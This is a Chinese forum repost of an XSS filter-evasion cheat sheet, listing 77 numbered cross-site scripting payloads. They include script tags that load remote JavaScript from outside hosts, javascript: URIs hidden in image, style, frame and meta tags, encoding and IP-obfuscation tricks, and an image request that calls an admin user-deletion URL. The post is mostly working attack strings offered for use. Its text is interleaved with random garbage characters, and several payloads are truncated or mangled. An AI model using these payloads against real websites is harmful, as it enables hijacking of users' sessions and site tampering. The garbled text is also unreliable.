貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 j( b+ _, K: g) w(1)普通的XSS JavaScript注入" X- p3 s2 v0 T. A! @3 {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! z, J) P/ S$ [5 R
(2)IMG标签XSS使用JavaScript命令% `9 |6 K+ h' [% q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& n7 d3 f7 s2 }) x9 i E; O1 g(3)IMG标签无分号无引号: H; i/ _/ |& W& Q5 H
<IMG SRC=javascript:alert(‘XSS’)>
$ k' g* e, f5 O" I(4)IMG标签大小写不敏感- G' ?2 Y( _9 k, X9 z, Y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- J* D" W8 Q6 E0 C) _3 R( q N(5)HTML编码(必须有分号)
( f+ y9 Z+ e" x) K; U<IMG SRC=javascript:alert(“XSS”)>
: t- \5 w2 g B- c$ y! G1 @: Y* S(6)修正缺陷IMG标签
8 E0 @9 P/ i2 A' b) A) a, r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% L" t* o; [* e* X( b
1 b# y& G" Q4 c. j0 h5 }& c: F G
(7)formCharCode标签(计算器)
/ h7 D( Y( q; n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> F' U+ `* l9 B: {4 ?
(8)UTF-8的Unicode编码(计算器)3 v0 S. v x0 ? f! ~
<IMG SRC=jav..省略..S')>
3 `" x; v, {# s(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ B" m7 @6 f9 Q8 N* r
<IMG SRC=jav..省略..S')>, L& H5 H9 `, N4 M
(10)十六进制编码也是没有分号(计算器)2 Z# x/ N% f2 `$ ]: d3 i
<IMG SRC=java..省略..XSS')>
. U0 A) l. P' S- Y$ |. @(11)嵌入式标签,将Javascript分开
2 J. { z0 k- G1 ]$ k<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 y0 ?$ }! O& E(12)嵌入式编码标签,将Javascript分开
9 p2 x; A/ r) J% e, ^# Y8 Z: Q<IMG SRC=”jav ascript:alert(‘XSS’);”>) V0 ] `. t5 r8 Y# t
(13)嵌入式换行符
+ K/ N, t9 A1 {, ^4 `9 f<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 B/ b* L- g' K3 [(14)嵌入式回车
" f* s2 E: x" i4 ~% S<IMG SRC=”jav ascript:alert(‘XSS’);”>: [( t# K# ~( C- P5 X; u8 T8 m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
/ F) ?; J1 A0 t( ]: L4 I V. [, l# C( V<IMG SRC=”javascript:alert(‘XSS‘)”>7 R$ J( A6 P% {8 Z; k. k+ u8 ] C
(16)解决限制字符(要求同页面); o R2 z. _" p
<script>z=’document.’</script># |0 t: I9 H+ W' I: Q. L
<script>z=z+’write(“‘</script>
- x# q* V7 s, d2 s u<script>z=z+’<script’</script>0 D2 }1 u+ m8 ^0 O/ }: P# k4 R5 I
<script>z=z+’ src=ht’</script># _1 C2 H# c3 V) |
<script>z=z+’tp://ww’</script>; d( p+ T: N$ ~9 T" Q- C/ g
<script>z=z+’w.shell’</script>
4 K7 C$ L& V' [# n5 m<script>z=z+’.net/1.’</script>
: I4 }/ g$ A; _; w. B* ~! D<script>z=z+’js></sc’</script>
0 w" M3 r4 L. J# T0 f, h/ V<script>z=z+’ript>”)’</script>* X% C9 k2 U# U
<script>eval_r(z)</script>+ v4 k" H: x" W# j- f: w
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
# l/ |4 w! x/ t. T1 V7 xhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
5 n( a' B- Y. p* R0 S, s7 operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 f% G" P# R' ]% B
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 u B' u" E- ?% W
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( _1 S& M! r+ ~9 F4 I9 y/ l(19)Spaces和meta前的IMG标签5 P$ a- a7 u$ `- F2 G/ ]2 S: U
<IMG SRC=” javascript:alert(‘XSS’);”>4 z7 U" V$ F1 n( A0 o
(20)Non-alpha-non-digit XSS
0 R* c! v, q- D1 O) H<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> ?4 d, y! B. V5 p g1 b- T
(21)Non-alpha-non-digit XSS to 26 I" M# _" m9 |5 q; C5 D
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ C [. ?1 b. m8 b1 X" O(22)Non-alpha-non-digit XSS to 3
- p9 r2 ~5 i# Q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% |' g3 ^ c% T* E% P* ?& d; x9 j(23)双开括号
; P/ }: f$ B3 P0 i+ U9 H0 w<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* L+ v( B, N" f( i7 `/ r! w6 ~. \(24)无结束脚本标记(仅火狐等浏览器)
2 J" X0 V( H7 {. x9 V<SCRIPT SRC=http://3w.org/XSS/xss.js?<B># Q1 d$ w' s% d: t& @+ w
(25)无结束脚本标记2
6 } d* n5 O4 V3 ?. _# L$ f% V<SCRIPT SRC=//3w.org/XSS/xss.js>
% ]) v, l+ L e* I(26)半开的HTML/JavaScript XSS
2 \* ]6 E" a1 K<IMG SRC=”javascript:alert(‘XSS’)”
/ H: g7 ~) Q' Z(27)双开角括号1 d4 [ f" Q6 L4 u
<iframe src=http://3w.org/XSS.html <
! Q& s: C. m9 \2 B4 V. \. M! ~(28)无单引号 双引号 分号
' W4 S, ~( ~8 ]; f& R<SCRIPT>a=/XSS/
7 `( Q, s# @2 o3 |alert(a.source)</SCRIPT>. g M: W/ z1 l7 x& t. F& I
(29)换码过滤的JavaScript
/ q6 s2 A& o$ E; ~3 |9 ~; d2 D1 M1 ]\”;alert(‘XSS’);//
9 ~' @( N, Q- o9 R(30)结束Title标签 d$ m! |# U1 G7 m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
& {$ X: L6 U) Y$ K$ M; Z7 J1 z+ D(31)Input Image; ^+ {- N0 z2 R0 ^
<INPUT SRC=”javascript:alert(‘XSS’);”>( F {0 w7 a' H" y7 }( p
(32)BODY Image5 N; g5 I" S- A- l" R
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% j8 m3 \: R# j4 m+ Y' o(33)BODY标签( N/ r# d8 }( C& T( z9 L
<BODY(‘XSS’)>
. P6 Z) D4 e! e1 @' ?, U$ X# ?(34)IMG Dynsrc
1 e2 n, Y+ X4 u; N% e9 U<IMG DYNSRC=”javascript:alert(‘XSS’)”>' [- \# A) ^3 s
(35)IMG Lowsrc& q! Q( \1 B/ M7 } ]
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 [& ?5 q1 r% V5 u8 `$ h6 I(36)BGSOUND C4 N/ K* e- }* {
<BGSOUND SRC=”javascript:alert(‘XSS’);”>* Z3 v) G/ C6 I$ f0 W! V: M% {
(37)STYLE sheet
% x o9 X/ M. z/ z9 l<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>+ _' D: d) J! `, n6 _ Q* H
(38)远程样式表/ F' f' | h: H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>1 R. t+ O' e% c3 `7 C# Q7 E
(39)List-style-image(列表式). N: K1 z1 D b; X2 m2 l1 L
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 ]2 Z9 g5 Y) E9 x0 U
(40)IMG VBscript. R% h" S$ s+ Q, M& i
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
' n: \# n; e6 E(41)META链接url* O$ j2 H# r" Q- M4 ~+ J0 Y
/ o) [5 d/ R2 U3 h: d7 T, W1 v! b1 k! V. ~
<META HTTP-EQUIV=”refresh” CONTENT=”0;
" g6 o3 ~/ L, L8 x; M+ O2 gURL=http://;URL=javascript:alert(‘XSS’);”>
5 u5 p% o) U9 @* W(42)Iframe
, ?& r G4 m6 U$ M- [<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- u1 H- D) Z9 v( t' v(43)Frame
( c/ l% ^ S8 R' t u+ ]9 H<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board3 G; K4 b* R9 y: k0 K
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
5 i G$ @! Y- C, S+ t n; q(44)Table1 ~' _% T: \# m& ?1 e9 y0 }" y. E( m
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( w6 k$ F7 ^: l/ M, @! d* n(45)TD. d3 b; B% G' X: K* ^2 c8 E( _% V
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( Y' C2 h% d, B(46)DIV background-image
. d' P' r) E" i# k) p<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- P9 c6 u" h% {# o$ `* E7 t0 V(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
6 F1 A) Y: M9 i* `8&13&12288&65279)+ J, [1 ?. K; B( L$ Q* ^0 U1 r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& I; U. e: {7 S+ {. @4 o3 J
(48)DIV expression, J+ [$ M! F! C4 D) J6 P! ?7 O
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& {) c! m5 g! f1 q+ ^(49)STYLE属性分拆表达- x7 p; }8 R9 G4 |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 R" E) o- c: z7 V. P+ ]
(50)匿名STYLE(组成:开角号和一个字母开头)/ R3 `& a% k! Q" n& e0 {; R3 l
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. D4 m: ?/ y% Z4 T(51)STYLE background-image
8 V, A# A# C2 ]+ Q1 R2 n- y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
4 P z! N9 y& k7 wCLASS=XSS></A>0 R, _: z% x9 Z2 ]* f
(52)IMG STYLE方式
3 y6 k) x! ^# L$ ]0 Iexppression(alert(“XSS”))’>0 k9 O* F- @4 f2 N4 p- f+ M
(53)STYLE background
7 y2 v! \" a- V) {<STYLE><STYLE
. D7 L; ^: ]& I( e& vtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' O: F5 l8 ?6 z9 C- I+ W2 C(54)BASE
' Z9 v4 [4 l) W1 Q/ q1 W<BASE HREF=”javascript:alert(‘XSS’);//”>9 F4 h3 B! ]$ I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS {1 F9 V4 j/ ~7 t+ e: b* V+ H# F, E
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED> R! k1 |6 b% Y+ g( c* v
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 p, N6 D' m! U% W. r) _9 }' m: G1 Ua=”get”;1 c( _3 e* f+ Z1 O2 _7 @
b=”URL(\”";1 _. L$ x, z- V
c=”javascript:”;
9 w2 y' o) K0 f+ ?d=”alert(‘XSS’);\”)”;# T, [5 n* A& K) f7 H g8 j
eval_r(a+b+c+d);9 g3 A6 V _8 k( ~+ Q( X; Z$ G* g
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- B5 k7 o+ }6 i* \
<HTML xmlns:xss># {3 W7 ?) Z2 m0 g3 D/ \6 j
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>* W! {- ~( p; P8 y
<xss:xss>XSS</xss:xss>
7 M- S0 b) l% S8 i4 G</HTML>
2 a! U* s' C6 _3 ^(58)如果过滤了你的JS你可以在图片里添加JS代码来利用% p! c4 m" R a- s4 t
<SCRIPT SRC=””></SCRIPT>
$ s, \* H* g- T. J1 Q' V' B" C(59)IMG嵌入式命令,可执行任意命令/ [8 c {& B! i P
<IMG SRC=”http://www.XXX.com/a.php?a=b”>+ q) M. }8 v k: L# u& y
(60)IMG嵌入式命令(a.jpg在同服务器)
' E1 u9 H+ e, C8 ?' `0 V- M* ^Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 m/ c9 k& g3 K/ u$ v
(61)绕符号过滤$ w6 D) a' |: z- N' y/ n. `
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>9 g8 \% t) R. E; N7 n0 U
(62)9 b& ]9 h" A2 C& s4 P' L0 b
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# ~- E+ _5 y+ s2 y5 N) N(63)1 ^3 l$ S: v) b) R; @
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: i2 @2 @) }! K6 h4 a- L(64)4 r! d) z8 a: U
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
2 g9 e; I! Q+ I0 L4 N(65)6 |9 p7 d" I+ }( M: ~9 w0 Z
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 \, }9 [' \" l
(66)12-7-1 T00LS - Powered by Discuz! Board
! K' E. T$ x' P0 t1 _https://www.t00ls.net/viewthread ... table&tid=15267 4/67 H6 ^: {, d, p- ?, o7 b, u" d
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. o) ]; s) p: O+ o* L
(67)6 w/ i L3 q0 ~2 j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>: k7 O. Q7 |0 ~* G2 R, y) V
</SCRIPT>1 U. x0 _3 E$ W# R( g8 X/ `. C
(68)URL绕行
! ]: W% e' ^' x5 v t- |<A HREF=”http://127.0.0.1/”>XSS</A>5 t/ ~# D# `. _( z3 j4 g
(69)URL编码
+ s1 w% [( T, U' }' }<A HREF=”http://3w.org”>XSS</A># D9 a) D, H G. }4 }4 Z |# N4 d; A
(70)IP十进制
( E* i& n# y% D5 O- |<A HREF=”http://3232235521″>XSS</A> `1 b0 D }- c2 b
(71)IP十六进制
0 p: N; H, F! \( l8 t! u8 A<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
4 H( P: _% l4 a4 d(72)IP八进制1 u& j. R5 p; F4 x3 }$ o) u, g
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
3 L* T* S3 f) ]/ Q(73)混合编码
$ k' v# S% T: V<A HREF=”h5 u: e! ^7 t5 u
tt p://6 6.000146.0×7.147/”">XSS</A>
0 X- Q$ X6 ^% ]5 \. Z3 |( e(74)节省[http:], I; O4 G0 ~/ Q. R Z
<A HREF=”//www.google.com/”>XSS</A>) b! @4 D9 Z& o0 ?
(75)节省[www]3 ]% L. z- ^, U, ?5 P4 Z: i
<A HREF=”http://google.com/”>XSS</A>
# {$ z5 c* n; M5 E(76)绝对点绝对DNS& |% ^6 `, D0 [$ u/ d
<A HREF=”http://www.google.com./”>XSS</A>
8 r5 M8 s# O( H( b" L* {(77)javascript链接
) R: Q% K, `0 o7 w# M; f<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>! g7 @8 B J! W. E: Y
+ d% P8 G" t1 Y: u
原文地址:http://fuzzexp.org/u/0day/?p=149 t- D0 w# |6 D% X; j/ s2 U
" e: s: J3 R5 C7 X% B1 n |
发表于 2013-4-19 19:22:37
收藏
支持
反对